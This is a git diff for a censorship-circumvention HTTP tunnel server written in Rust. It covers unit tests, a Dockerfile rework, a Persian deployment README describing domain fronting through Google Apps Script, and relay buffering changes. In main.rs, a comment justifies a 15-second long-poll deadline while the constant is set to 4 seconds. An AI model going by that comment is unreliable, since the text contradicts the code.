+        // Empty-poll Data: mux_loop converts empty Bytes to data: None.
+        let empty_poll = PendingOp {
+            op: "data",
+            sid: Some("sid-2".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(empty_poll).d.is_none());
+
+        // UDP poll with no payload: same shape.
+        let udp_poll = PendingOp {
+            op: "udp_data",
+            sid: Some("sid-3".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(udp_poll).d.is_none());
+
+        // Close has no data and no reply — `d` must stay omitted.
+        let close = PendingOp {
+            op: "close",
+            sid: Some("sid-4".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(close).d.is_none());
+    }
+
+    #[test]
+    fn encode_pending_connect_data_emits_empty_string_when_data_is_empty() {
+        // Defensive: ConnectData's wire contract is that `d` is always
+        // present (its presence is the signal that the caller is opting
+        // into the bundled-first-bytes flow). If an empty Bytes ever
+        // reaches the encoder, we must serialize `d: ""` not omit it.
+        let op = PendingOp {
+            op: "connect_data",
+            sid: None,
+            host: Some("example.com".into()),
+            port: Some(443),
+            data: Some(Bytes::new()),
+            encode_empty: true,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.op, "connect_data");
+        assert_eq!(b.d.as_deref(), Some(""));
+    }
+
+    #[test]
+    fn encode_pending_connect_data_with_payload_encodes_normally() {
+        let op = PendingOp {
+            op: "connect_data",
+            sid: None,
+            host: Some("example.com".into()),
+            port: Some(443),
+            data: Some(Bytes::from_static(b"\x16\x03\x01")), // ClientHello prefix
+            encode_empty: true,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.d.as_deref(), Some(B64.encode(b"\x16\x03\x01").as_str()));
     }
 
     #[test]
@@ -1219,4 +2763,107 @@ mod tests {
         // Five record_* calls, so trigger counter is at 5.
         assert_eq!(mux.preread_total_events.load(Ordering::Relaxed), 5);
     }
+
+    /// Client data written to the socket *during* the reply wait must be
+    /// buffered and sent in a subsequent op — not blocked until the reply
+    /// arrives and a fresh read-timeout elapses.
+    #[tokio::test]
+    async fn tunnel_loop_reads_client_during_reply_wait() {
+        use tokio::io::AsyncWriteExt;
+        use tokio::net::TcpListener;
+
+        let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
+        let mut client = TcpStream::connect(addr).await.unwrap();
+        let server_side = accept.await.unwrap();
+
+        let (mux, mut rx) = mux_for_test();
+
+        let loop_handle = tokio::spawn({
+            let mux = mux.clone();
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-overlap", &mux, None).await
+            }
+        });
+
+        // With pipelining (N=2), the loop may send two ops before we
+        // can write client data. Collect all initial ops, reply to each,
+        // then write data and check a subsequent op carries it.
+        let mut pending_replies: Vec<BatchedReply> = Vec::new();
+        let mut seq: u64 = 0;
+
+        // Drain initial ops (up to N=2).
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                pending_replies.push(reply);
+            }
+            if pending_replies.len() >= INFLIGHT_ACTIVE { break; }
+        }
+
+        // Write client data while replies are pending.
+        client.write_all(b"UPLOAD_DATA").await.unwrap();
+        client.flush().await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        // Reply to all pending ops (no eof, no data).
+        for reply in pending_replies.drain(..) {
+            let _ = reply.send(Ok((
+                TunnelResponse {
+                    sid: Some("sid-overlap".into()),
+                    d: None, pkts: None, eof: None,
+                    e: None, code: None, seq: Some(seq),
+                },
+                "test-script".to_string(),
+            )));
+            seq += 1;
+        }
+
+        // Now check that a subsequent op carries the buffered upload data.
+        let mut found_upload = false;
+        for _ in 0..4 {
+            let msg = match tokio::time::timeout(Duration::from_secs(2), rx.recv()).await {
+                Ok(Some(m)) => m,
+                _ => break,
+            };
+            if let MuxMsg::Data { data, reply, .. } = msg {
+                if &data[..] == b"UPLOAD_DATA" {
+                    found_upload = true;
+                }
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-overlap".into()),
+                        d: None, pkts: None,
+                        eof: Some(found_upload),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+                if found_upload { break; }
+            }
+        }
+        assert!(found_upload, "upload data must appear in a subsequent op");
+
+        // Drain any remaining in-flight ops (stagger sleep is 1 s,
+        // so allow enough time for late-arriving ops).
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(1500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-overlap".into()),
+                        d: None, pkts: None, eof: Some(true),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+            }
+        }
+
+        let _ = tokio::time::timeout(Duration::from_secs(4), loop_handle)
+            .await
+            .expect("tunnel_loop did not exit after eof");
+    }
 }
diff --git a/tunnel-node/Dockerfile b/tunnel-node/Dockerfile
index a31f31e8..c5329dd5 100644
--- a/tunnel-node/Dockerfile
+++ b/tunnel-node/Dockerfile
@@ -1,12 +1,14 @@
-# syntax=docker/dockerfile:1
-#
 # Multi-stage build for the mhrv-tunnel-node service.
 #
-# Build stage compiles a release binary against rust 1.85 (matches MSRV in
-# Cargo.toml). Cargo's incremental build cache is mounted via BuildKit
-# `--mount=type=cache` so a `docker build` against an unchanged dependency
-# tree skips re-downloading + re-compiling crates — first build ~6 min,
-# warm builds ~30 s.
+# Build stage compiles a release binary on a recent stable Rust.
+# Dependency caching is done via `cargo-chef`: a separate layer cooks
+# just the dependencies first, so warm rebuilds where only `src/`
+# changes reuse that layer and skip recompiling crates.
+#
+# This intentionally avoids BuildKit `--mount=type=cache` directives so
+# the Dockerfile builds on classic Docker daemons too — notably Cloud
+# Run's `gcloud run deploy --source .` builder, which does not enable
+# BuildKit (see issue #620).
 #
 # Runtime stage is `debian:bookworm-slim` for libc compatibility (the
 # binary dynamically links against glibc) plus `ca-certificates` so HTTPS
@@ -27,31 +29,28 @@
 # `--health-cmd 'curl -fsS http://localhost:8080/ || exit 1'` on the
 # `docker run` if you want compose-level health gating.
 
-FROM rust:1.85-slim AS builder
+FROM rust:1.90-slim AS chef
+RUN cargo install cargo-chef --locked --version 0.1.77
 WORKDIR /app
-# Copy lockfile so cargo uses pinned versions identically to local builds.
+
+FROM chef AS planner
+COPY Cargo.toml Cargo.lock ./
+COPY src/ ./src/
+RUN cargo chef prepare --recipe-path recipe.json
+
+FROM chef AS builder
+COPY --from=planner /app/recipe.json recipe.json
+RUN cargo chef cook --release --recipe-path recipe.json
 COPY Cargo.toml Cargo.lock ./
 COPY src/ ./src/
-# BuildKit cache mounts: cargo's registry/git caches and the target/
-# directory persist across builds, dramatically speeding up rebuilds when
-# only application code changes.
-RUN --mount=type=cache,target=/usr/local/cargo/registry \
-    --mount=type=cache,target=/usr/local/cargo/git \
-    --mount=type=cache,target=/app/target \
-    cargo build --release --bin tunnel-node && \
+RUN cargo build --release --bin tunnel-node && \
     cp /app/target/release/tunnel-node /usr/local/bin/tunnel-node
 
 FROM debian:bookworm-slim
-# `ca-certificates` for HTTPS upstream targets; nothing else needed at
-# runtime since the binary is statically linked against musl-equivalents
-# only for the parts that don't touch glibc.
 RUN apt-get update \
     && apt-get install -y --no-install-recommends ca-certificates \
     && rm -rf /var/lib/apt/lists/*
 
-# Non-root runtime user. The service does no filesystem writes outside
-# /tmp, so a static-uid unprivileged user is sufficient and prevents
-# accidental host-FS writes if the container is volume-mounted.
 RUN useradd --system --uid 1000 --no-create-home --shell /usr/sbin/nologin tunnel
 
 COPY --from=builder /usr/local/bin/tunnel-node /usr/local/bin/tunnel-node
diff --git a/tunnel-node/README.fa.md b/tunnel-node/README.fa.md
new file mode 100644
index 00000000..007f7174
--- /dev/null
+++ b/tunnel-node/README.fa.md
@@ -0,0 +1,188 @@
+# Tunnel Node — راهنمای فارسی
+
+> *English: [README.md](./README.md)*
+
+سرور پل HTTP-tunnel برای حالت `full` در MasterHttpRelayVPN. درخواست‌های HTTP-tunnel رو که از Apps Script می‌رسن، به اتصال‌های واقعی TCP/UDP تبدیل می‌کنه.
+
+این `tunnel-node` همون قطعه‌ای از مسیر Full mode هست که روی **VPS شما** اجرا می‌شه. جواب کوتاه به سؤال «آیا VPS لازمه؟» = **بله، برای حالت Full بدون VPS کار نمی‌کنه**.
+
+## معماری
+
+```
+موبایل/PC → mhrv-rs → [TLS با domain-fronting روی Google] → Apps Script → [HTTP] → Tunnel Node (روی VPS شما) → [TCP/UDP واقعی] → اینترنت
+```
+
+Tunnel-node session‌های پایدار TCP و UDP رو نگه می‌داره. session‌های TCP اتصال‌های واقعی به سرور مقصد هستن؛ session‌های UDP، socketهای connected-UDP به یک `host:port` مقصد هستن. data از طریق پروتکل JSON جریان داره:
+
+- **connect** — باز کردن TCP به `host:port` + برگرداندن session ID
+- **data** — نوشتن data کلاینت + خوندن جواب سرور
+- **udp_open** — باز کردن UDP به `host:port`، اختیاری اولین datagram رو همزمان می‌فرسته
+- **udp_data** — یک datagram UDP می‌فرسته، یا اگه `d` ست نشه برای datagram‌های برگشتی poll می‌کنه
+- **close** — تخریب session
+- **batch** — پردازش چند op در یک request HTTP (تعداد روند-تریپ کمتر)
+
+## استقرار
+
+### Cloud Run (پیشنهاد برای کاربران ایرانی متأثر از فیلتر #313)
+
+اجرای tunnel-node روی **Google Cloud Run** یعنی destination IP خود Google هست — احتمال filter شدن مسیر Apps Script → tunnel-node توسط ISP ایران بسیار پایین‌تر از Hetzner/DigitalOcean. ([کانتکست در #313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313))
+
+```bash
+cd tunnel-node
+gcloud run deploy tunnel-node \
+  --source . \
+  --region us-central1 \
+  --allow-unauthenticated \
+  --set-env-vars TUNNEL_AUTH_KEY=$(openssl rand -hex 24) \
+  --memory 256Mi \
+  --cpu 1 \
+  --max-instances 1
+```
+
+### Docker — image آماده (هر VPS)
+
+سریع‌ترین مسیر. image آماده pull کن و اجرا کن؛ نیاز به Rust toolchain روی VPS نیست.
+
+```bash
+# secret قوی بساز. ذخیره‌اش کن — همین مقدار رو بعداً تو CodeFull.gs paste می‌کنی.
+SECRET=$(openssl rand -hex 24)
+echo "TUNNEL_AUTH_KEY شما: $SECRET"
+
+# Pull + run.
+docker run -d \
+  --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8080:8080 \
+  -e TUNNEL_AUTH_KEY="$SECRET" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+تگ `:latest` آخرین release رو دنبال می‌کنه. برای production توصیه می‌شه روی version مشخص pin بزنی: `ghcr.io/therealaleph/mhrv-tunnel-node:v1.8.0` (یا هر نسخه‌ای که داری). image روی `linux/amd64` و `linux/arm64` موجوده.
+
+**docker-compose.yml** اگه این رو ترجیح می‌دی:
+
+```yaml
+services:
+  tunnel:
+    image: ghcr.io/therealaleph/mhrv-tunnel-node:latest
+    restart: unless-stopped
+    ports:
+      - "8080:8080"
+    environment:
+      TUNNEL_AUTH_KEY: ${TUNNEL_AUTH_KEY}
+```
+
+سپس `TUNNEL_AUTH_KEY=your-secret docker compose up -d`.
+
+### Docker — build از source
+
+اگه می‌خوای خودت image رو build کنی (یا custom تغییر بدی):
+
+```bash
+cd tunnel-node
+docker build -t tunnel-node .
+docker run -p 8080:8080 -e TUNNEL_AUTH_KEY=your-secret tunnel-node
+```
+
+### Binary مستقیم
+
+```bash
+cd tunnel-node
+cargo build --release
+TUNNEL_AUTH_KEY=your-secret PORT=8080 ./target/release/tunnel-node
+```
+
+## متغیرهای محیطی
+
+| متغیر | الزامی | پیش‌فرض | توضیح |
+|-------|--------|---------|-------|
+| `TUNNEL_AUTH_KEY` | بله | `changeme` | secret مشترک — باید با `TUNNEL_AUTH_KEY` در CodeFull.gs match کنه |
+| `PORT` | خیر | `8080` | پورت listen (Cloud Run خودش این رو ست می‌کنه) |
+| `MHRV_DIAGNOSTIC` | خیر | (off) | اگه `1` باشه، روی auth بد به‌جای decoy 404 nginx، JSON `{"e":"unauthorized"}` صریح برمی‌گردونه. **فقط برای setup/debug** — قبل از public کردن tunnel-node خاموشش کن. (v1.8.0+) |
+
+## پروتکل
+
+### تک op: `POST /tunnel`
+
+```json
+{"k":"auth","op":"connect","host":"example.com","port":443}
+{"k":"auth","op":"data","sid":"uuid","data":"base64"}
+{"k":"auth","op":"close","sid":"uuid"}
+```
+
+### Batch: `POST /tunnel/batch`
+
+```json
+{
+  "k": "auth",
+  "ops": [
+    {"op":"data","sid":"uuid1","d":"base64"},
+    {"op":"udp_data","sid":"uuid2","d":"base64"},
+    {"op":"close","sid":"uuid3"}
+  ]
+}
+→ {"r": [{...}, {...}, {...}]}
+```
+
+### Health check: `GET /health` → `ok`
+
+## Performance: تعداد deployment و عمق pipeline
+
+کلاینت mhrv-rs در حالت Full یک batch-multiplexer pipelined اجرا می‌کنه. هر روند-تریپ Apps Script حدود ۲ ثانیه طول می‌کشه، پس کلاینت چندین request batch همزمان شلیک می‌کنه — عمق pipeline برابر تعداد deployment ID‌های Apps Script هست (حداقل ۲، بدون سقف بالا).
+
+تعداد deployment بیشتر = batchهای همزمان بیشتر روی tunnel-node = latency پایین‌تر برای session. با ۶ deployment، هر ۰.۳ ثانیه یه batch جدید می‌رسه (به‌جای هر ۲ ثانیه).
+
+خود tunnel-node per-request stateless هست (session‌ها بر اساس UUID key می‌شن)، پس batchهای همزمان رو طبیعی handle می‌کنه. برای بهترین نتیجه، ۳–۱۲ Apps Script روی account‌های Google جداگانه deploy کن و همهٔ deployment ID‌ها رو در config کلاینت لیست کن.
+
+---
+
+## سؤالات رایج
+
+### حجم مصرف چقدره؟
+
+سه لایه overhead هست در حالت Full:
+
+1. **Base64 encoding** برای data ها در JSON envelope = ~۳۳٪ overhead روی payload (4 byte per 3 byte raw)
+2. **JSON envelope + headers** = ~۵-۱۵٪ overhead بسته به اندازه payload
+3. **Random padding (v1.8.0+)** برای DPI defense = متوسط ۵۱۲ بایت اضافه به هر batch
+
+تخمین کلی: اگه ۱ GB دانلود می‌کنی، ~۱.۲۵-۱.۳ GB روی پهنای باند VPS مصرف می‌کنه.
+
+برای ۲۰ GB ماهانه استفاده روزمره (browsing + Telegram + ویدیو متوسط)، ~۲۵-۲۷ GB پهنای باند VPS لازم داری. Hetzner CX11 (€۴/ماه) ۲۰ TB ماهانه می‌ده — یعنی به سقف نمی‌رسی مگه streaming سنگین.
+
+### روی موبایل کل برنامه‌ها رو بالا میاره؟
+
+**بستگی به Mode داره:**
+
+- **mhrv-rs Android در Tunnel mode (Operating Mode → Tunnel)** + Full + tunnel-node = ✅ کل ترافیک Android (شامل YouTube، Telegram MTProto، Instagram، Snapchat، هر چیزی) capture می‌شه. این از VpnService استفاده می‌کنه.
+- **mhrv-rs Android در Proxy mode** + Full + tunnel-node = فقط app‌هایی که proxy رو صریحاً respect می‌کنن (Chrome، Firefox، برخی app‌های Telegram-فارسی). YouTube/Insta/Telegram اصلی proxy رو نادیده می‌گیرن + از mhrv-rs رد نمی‌شن.
+
+برای اینکه «همهٔ app‌ها بیان» = حتماً **Tunnel mode** فعال کن.
+
+### سرعت چقدر خوبه؟
+
+برای یک flow (یک download، یک ویدیو، یک TCP connection) معمولاً **۵۰–۲۰۰ KB/s** هست. علت:
+
+- Apps Script روند-تریپ floor ~۲۰۰-۵۰۰ ms داره (غیر قابل پایین آوردن، Google-side limit)
+- هر batch به یک deployment باند می‌شه + هر flow به یک batch
+- در نتیجه per-flow throughput = batch_size / batch_round_trip = (~۶۴-۲۵۶ KB) / (~۲۵۰-۵۰۰ ms) ≈ ۱۲۸-۵۰۰ KB/s ceiling
+
+برای **چند flow همزمان** (browsing با چند تب، Telegram + YouTube همزمان)، throughput جمعی به sum از همه flow‌ها مقیاس می‌خوره — با ۶ deployment روی ۶ Google account می‌تونی ۶ flow همزمان داشته باشی.
+
+**توصیه واقع‌بینانه:** برای browsing عادی + chat + ویدیو متوسط = کافیه. برای دانلود فایل‌های بزرگ سریع، **Wireguard مستقیم روی همان VPS** ابزار درست‌تره (۵-۱۰x سریع‌تر، چون Apps Script رو دور می‌زنه). mhrv-rs ارزش اصلیش لایه «دور زدن censorship با domain-fronting» هست، نه سرعت raw — وقتی به اون لایه نیاز نداری (مسیر مستقیم به VPS باز هست)، ابزار ساده‌تر بهتره.
+
+### آیا VPS لازمه؟
+
+برای **حالت Full** (شامل Telegram، YouTube بدون 60s SABR cliff، WebSockets، MTProto و هر چیزی غیر-HTTPS-ساده): **بله، VPS الزامی هست**.
+
+برای **حالت `apps_script`** (browsing فقط HTTPS): **خیر، نیاز به VPS نیست** — فقط نیاز به Apps Script setup روی Google account داری.
+
+برای **حالت `direct`** (Google services مثل Search/Gmail/YouTube، به علاوهٔ هر `fronting_groups` که تنظیم کرده باشید): **نه VPS لازمه نه Apps Script** — فقط تونل بازنویسی `SNI`. (نام قبلی این حالت `google_only` بود.)
+
+### چه VPS‌ای پیشنهاد می‌شه؟
+
+- **Hetzner CX11** (Falkenstein/Helsinki، €۴/ماه) — best value، ۲۰ TB ماهانه، خوب برای کاربران اروپا/خاورمیانه
+- **DigitalOcean basic droplet** ($۶/ماه، NYC/SFO) — برای کاربران آمریکا
+- **Google Cloud Run** (free tier تا ۲ میلیون request/ماه + ۵ GB egress) — تنها provider که destination IP اصلاً Google هست، پس مسیر Iran→Apps Script→Cloud-Run-tunnel-node کاملاً درون شبکه Google می‌مونه و ISP filter نمی‌بینه. **بهترین گزینه برای کاربران ایرانی متأثر از [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)**.
+
+برای راهنمای قدم‌به‌قدم setup: [#310 reply (راهنمای فارسی)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310#issuecomment-4326086988).
diff --git a/tunnel-node/README.md b/tunnel-node/README.md
index 88d884ba..529c15e3 100644
--- a/tunnel-node/README.md
+++ b/tunnel-node/README.md
@@ -1,5 +1,7 @@
 # Tunnel Node
 
+> *Persian / فارسی: [README.fa.md](./README.fa.md)*
+
 HTTP tunnel bridge server for MasterHttpRelayVPN "full" mode. Bridges HTTP tunnel requests (from Apps Script) to real TCP connections.
 
 ## Architecture
diff --git a/tunnel-node/src/main.rs b/tunnel-node/src/main.rs
index e03ff5e8..33809086 100644
--- a/tunnel-node/src/main.rs
+++ b/tunnel-node/src/main.rs
@@ -22,12 +22,14 @@ use axum::{routing::post, Json, Router};
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
 use serde::{Deserialize, Serialize};
-use tokio::io::{AsyncReadExt, AsyncWriteExt};
-use tokio::net::tcp::{OwnedReadHalf, OwnedWriteHalf};
+use tokio::io::{AsyncRead, AsyncReadExt, AsyncWriteExt};
+use tokio::net::tcp::OwnedWriteHalf;
 use tokio::net::{lookup_host, TcpStream, UdpSocket};
 use tokio::sync::{mpsc, Mutex, Notify};
 use tokio::task::JoinSet;
 
+mod udpgw;
+
 /// Structured error code returned when the tunnel-node receives an op it
 /// doesn't recognize. Clients use this (rather than string-matching `e`) to
 /// detect a version mismatch and gracefully fall back.
@@ -40,16 +42,13 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
 /// milliseconds — once any session in the batch fires its notify.
 const ACTIVE_DRAIN_DEADLINE: Duration = Duration::from_millis(350);
 
-/// After the first session in an active batch wakes the wait, we sleep
-/// briefly so neighboring sessions whose responses land just after the
-/// first one don't get reported empty and pay an extra round-trip. Only
-/// applies to active batches — for long-poll batches the wake event IS
-/// the data we want, so we deliver it immediately.
-///
-/// 30 ms is much shorter than the legacy two-pass retry (150 + 200 ms)
-/// but covers the typical case of co-located upstreams whose RTTs
-/// cluster within a few tens of ms of each other.
-const STRAGGLER_SETTLE: Duration = Duration::from_millis(30);
+/// Adaptive straggler settle: after the first session in an active batch
+/// wakes the drain, keep checking in STEP increments whether new data is
+/// still arriving. Stops when no new data arrived in the last STEP (the
+/// burst is over) or MAX is reached. Packing more session responses into
+/// one batch saves quota on high-latency relays (~1.5s Apps Script overhead).
+const STRAGGLER_SETTLE_STEP: Duration = Duration::from_millis(10);
+const STRAGGLER_SETTLE_MAX: Duration = Duration::from_millis(1000);
 
 /// Drain-phase deadline when the batch is a pure poll (no writes, no new
 /// connections — clients just asking "any push data?"). Holding the
@@ -63,18 +62,16 @@ const STRAGGLER_SETTLE: Duration = Duration::from_millis(30);
 /// op per session), so any local bytes that arrive while the poll is
 /// being held are stuck in the kernel until the poll returns.
 ///
-///   * Lower (e.g. 2 s) — interactive shells / typing-burst flows feel
-///     snappier, but push-only sessions pay more empty round-trips.
-///   * Higher (e.g. 20 s) — push delivery is near-RTT and round-trip
-///     count is minimal, but a thinking pause between keystrokes can
-///     tax the next keystroke by up to the chosen value.
-///
-/// 5 s is a middle ground: a typing user pausing mid-thought pays at
-/// most a 5 s nudge before their next keystroke flows, while idle
-/// sessions still get the bulk of the long-poll benefit. Must also
-/// stay safely below the client's `BATCH_TIMEOUT` (30 s) and Apps
-/// Script's UrlFetch ceiling (~60 s).
-const LONGPOLL_DEADLINE: Duration = Duration::from_secs(5);
+/// 15 s keeps persistent connections (Telegram XMPP on :5222, Google
+/// Push on :5228) alive without forcing frequent reconnects. At 5 s,
+/// apps like Telegram interpreted the frequent empty returns as
+/// connection instability and rotated sessions — each reconnect costs
+/// a full TLS handshake (~4 s through Apps Script), causing visible
+/// video/voice interruptions. 15 s is well below the client's
+/// `BATCH_TIMEOUT` (30 s) and Apps Script's UrlFetch ceiling (~60 s).
+/// Tested on censored networks in Iran where users reported smoother
+/// Telegram video playback and fewer session resets at this value.
+const LONGPOLL_DEADLINE: Duration = Duration::from_secs(4);
 
 /// Bound on each UDP session's inbound queue. Beyond this we drop oldest
 /// to keep recent voice/media packets moving — a stale RTP frame is
@@ -86,6 +83,35 @@ const UDP_QUEUE_LIMIT: usize = 256;
 /// a maximum-size IPv4 datagram without truncation.
 const UDP_RECV_BUF_BYTES: usize = 65536;
 
+/// Maximum raw bytes per TCP drain that we hand back to Apps Script in
+/// one batch response. Apps Script's hard cap on Web App response body
+/// is ~50 MiB. Accounting for base64 encoding (1.33×) and JSON envelope
+/// overhead, the safe ceiling for raw bytes is roughly 32 MiB — but
+/// `serde_json::to_vec` for a single 32-MiB string is also a CPU spike,
+/// so we lean further back at 16 MiB. On a high-bandwidth VPS (1 Gbps+)
+/// the reader task can stuff the per-session buffer with tens of MiB
+/// between polls (issue #460); without this cap, `drain_now` would take
+/// the lot, the response would exceed Apps Script's ceiling, the body
+/// would be truncated mid-base64, and the client would fail JSON parse
+/// with `EOF while parsing a string at line 1 column ~52428685`. By
+/// returning at most this many bytes per drain and leaving the rest in
+/// the read buffer for the next poll, we keep responses comfortably
+/// under the cap and let throughput recover across batches.
+const TCP_DRAIN_MAX_BYTES: usize = 16 * 1024 * 1024;
+
+/// Hard cap on the total raw bytes drained across **all sessions** in a
+/// single batch response. The per-session cap (`TCP_DRAIN_MAX_BYTES`)
+/// alone isn't enough — N concurrent sessions can each contribute up to
+/// 16 MiB raw; with N≥4, the summed batch body exceeds Apps Script's
+/// 50 MiB ceiling and the client fails JSON parse mid-stream (#863).
+///
+/// 32 MiB raw → ~43 MiB base64 + per-session JSON envelope overhead
+/// (~80 bytes × ≤50 ops cap) → comfortably under 50 MiB total. Any
+/// further sessions in the same batch are deferred to the next poll
+/// (their data stays in their per-session `read_buf`, so no data loss
+/// — they just settle one batch later).
+const BATCH_RESPONSE_BUDGET: usize = 32 * 1024 * 1024;
+
 /// First queue-drop on a session always logs at warn level; subsequent
 /// drops log at debug only every Nth occurrence so a single congested
 /// session can't flood the operator's log.
@@ -95,8 +121,30 @@ const UDP_QUEUE_DROP_LOG_STRIDE: u64 = 100;
 // Session
 // ---------------------------------------------------------------------------
 
+/// Writer half — either a real TCP socket or an in-process duplex channel
+/// (used for virtual sessions like udpgw).
+enum SessionWriter {
+    Tcp(OwnedWriteHalf),
+    Duplex(tokio::io::WriteHalf<tokio::io::DuplexStream>),
+}
+
+impl SessionWriter {
+    async fn write_all(&mut self, buf: &[u8]) -> std::io::Result<()> {
+        match self {
+            SessionWriter::Tcp(w) => w.write_all(buf).await,
+            SessionWriter::Duplex(w) => w.write_all(buf).await,
+        }
+    }
+    async fn flush(&mut self) -> std::io::Result<()> {
+        match self {
+            SessionWriter::Tcp(w) => w.flush().await,
+            SessionWriter::Duplex(w) => w.flush().await,
+        }
+    }
+}
+
 struct SessionInner {
-    writer: Mutex<OwnedWriteHalf>,
+    writer: Mutex<SessionWriter>,
     read_buf: Mutex<Vec<u8>>,
     eof: AtomicBool,
     last_active: Mutex<Instant>,
@@ -105,11 +153,27 @@ struct SessionInner {
     /// to wake the drain phase as soon as any session has something to
     /// ship, replacing the old fixed-sleep heuristic.
     notify: Notify,
+    /// Sequence-ordered write buffer: pipelined data ops may arrive
+    /// out of order (different batches completing at different times).
+    /// We buffer out-of-order writes and flush in seq order.
+    next_write_seq: Mutex<Option<u64>>,
+    pending_writes: Mutex<std::collections::BTreeMap<u64, Vec<u8>>>,
 }
 
 struct ManagedSession {
     inner: Arc<SessionInner>,
     reader_handle: tokio::task::JoinHandle<()>,
+    /// For udpgw sessions, the server task handle (so we can abort on close).
+    udpgw_handle: Option<tokio::task::JoinHandle<()>>,
+}
+
+impl ManagedSession {
+    fn abort_all(&self) {
+        self.reader_handle.abort();
+        if let Some(ref h) = self.udpgw_handle {
+            h.abort();
+        }
+    }
 }
 
 /// UDP equivalent of `SessionInner`. Holds a *connected* `UdpSocket`
@@ -148,21 +212,45 @@ async fn create_session(host: &str, port: u16) -> std::io::Result<ManagedSession
     let (reader, writer) = stream.into_split();
 
     let inner = Arc::new(SessionInner {
-        writer: Mutex::new(writer),
+        writer: Mutex::new(SessionWriter::Tcp(writer)),
         read_buf: Mutex::new(Vec::with_capacity(32768)),
         eof: AtomicBool::new(false),
         last_active: Mutex::new(Instant::now()),
         notify: Notify::new(),
+        next_write_seq: Mutex::new(None),
+        pending_writes: Mutex::new(std::collections::BTreeMap::new()),
     });
 
     let inner_ref = inner.clone();
     let reader_handle = tokio::spawn(reader_task(reader, inner_ref));
 
-    Ok(ManagedSession { inner, reader_handle })
+    Ok(ManagedSession { inner, reader_handle, udpgw_handle: None })
+}
+
+/// Create a virtual udpgw session backed by an in-process duplex channel.
+fn create_udpgw_session() -> ManagedSession {
+    let (client_half, server_half) = tokio::io::duplex(65536);
+    let (read_half, write_half) = tokio::io::split(client_half);
+
+    let inner = Arc::new(SessionInner {
+        writer: Mutex::new(SessionWriter::Duplex(write_half)),
+        read_buf: Mutex::new(Vec::with_capacity(32768)),
+        eof: AtomicBool::new(false),
+        last_active: Mutex::new(Instant::now()),
+        notify: Notify::new(),
+        next_write_seq: Mutex::new(None),
+        pending_writes: Mutex::new(std::collections::BTreeMap::new()),
+    });
+
+    let inner_ref = inner.clone();
+    let reader_handle = tokio::spawn(reader_task(read_half, inner_ref));
+    let udpgw_handle = Some(tokio::spawn(udpgw::udpgw_server_task(server_half)));
+
+    ManagedSession { inner, reader_handle, udpgw_handle }
 }
 
-async fn reader_task(mut reader: OwnedReadHalf, session: Arc<SessionInner>) {
-    let mut buf = vec![0u8; 65536];
+async fn reader_task(mut reader: impl AsyncRead + Unpin, session: Arc<SessionInner>) {
+    let mut buf = vec![0u8; 2 * 1024 * 1024];
     loop {
         match reader.read(&mut buf).await {
             Ok(0) => {
@@ -274,13 +362,38 @@ async fn udp_reader_task(socket: Arc<UdpSocket>, session: Arc<UdpSessionInner>)
     }
 }
 
-/// Drain whatever is currently buffered — no waiting.
-/// Used by batch mode where we poll frequently.
-async fn drain_now(session: &SessionInner) -> (Vec<u8>, bool) {
+/// Drain up to `min(TCP_DRAIN_MAX_BYTES, max_bytes)` from the per-session
+/// read buffer — no waiting. Used by batch mode where we poll frequently.
+///
+/// `max_bytes` is the caller-supplied budget for this drain (typically the
+/// remaining batch-response budget after summing previous drains in the
+/// same batch). It allows the batch loop to stop one session short of
+/// blowing past Apps Script's 50 MiB ceiling on the wire (#863). Pass
+/// `usize::MAX` if there's no extra budget constraint (e.g. single-op
+/// path outside the batch loop).
+///
+/// If the buffer is larger than the effective cap, we return a prefix of
+/// the data and leave the remainder in the buffer for the next poll.
+///
+/// `eof` is reported as true only when the buffer has been fully drained
+/// AND upstream has signaled EOF — otherwise a partial drain would
+/// prematurely tear the session down on the client side.
+async fn drain_now(session: &SessionInner, max_bytes: usize) -> (Vec<u8>, bool) {
     let mut buf = session.read_buf.lock().await;
-    let data = std::mem::take(&mut *buf);
-    let eof = session.eof.load(Ordering::Acquire);
-    (data, eof)
+    let raw_eof = session.eof.load(Ordering::Acquire);
+    let cap = max_bytes.min(TCP_DRAIN_MAX_BYTES);
+    if buf.len() <= cap {
+        let data = std::mem::take(&mut *buf);
+        (data, raw_eof)
+    } else {
+        // Take the prefix; leave the tail in the buffer.
+        let tail = buf.split_off(cap);
+        let head = std::mem::replace(&mut *buf, tail);
+        // Don't propagate eof yet — buffer still has data even if upstream
+        // has closed. The client will get eof on the drain that returns
+        // an empty (or sub-cap) buffer.
+        (head, false)
+    }
 }
 
 /// Block until *any* of `inners` has buffered data, hits EOF, or the
